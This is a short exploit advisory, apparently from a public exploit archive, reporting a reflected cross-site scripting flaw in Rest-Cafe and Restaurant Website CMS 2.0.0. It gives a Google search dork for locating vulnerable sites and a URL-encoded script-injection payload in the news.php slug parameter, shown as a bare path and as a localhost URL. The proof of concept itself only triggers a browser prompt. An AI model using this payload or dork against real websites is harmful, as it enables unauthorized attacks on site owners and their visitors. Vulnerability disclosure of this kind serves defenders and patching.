Rest-Cafe and Restaurant Website CMS version 2.0.0 suffers from a cross site scripting vulnerability.
====================================================================================================================================
| # Title : Rest-Cafe and Restaurant Website CMS 2.0.0 ْXSS Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 67.0.1(64-bit) |
| # Vendor : https://codecanyon.net/item/rest-cafe-and-restaurant-website-cms/21630154 |
| # Dork : "news.php?slug=" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use Payload : /news.php?slug=at-his-ludus-nonumes-gloriatur-ne-vim-tamquam%27%22()%26%25%3Cacx%3E%3CScRiPt%3Eprompt(005605414920)%3C/ScRiPt%3E
[+] http://127.0.0.1/cms/news.php?slug=at-his-ludus-nonumes-gloriatur-ne-vim-tamquam%27%22()%26%25%3Cacx%3E%3CScRiPt%3Eprompt(005605414920)%3C/ScRiPt%3E
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================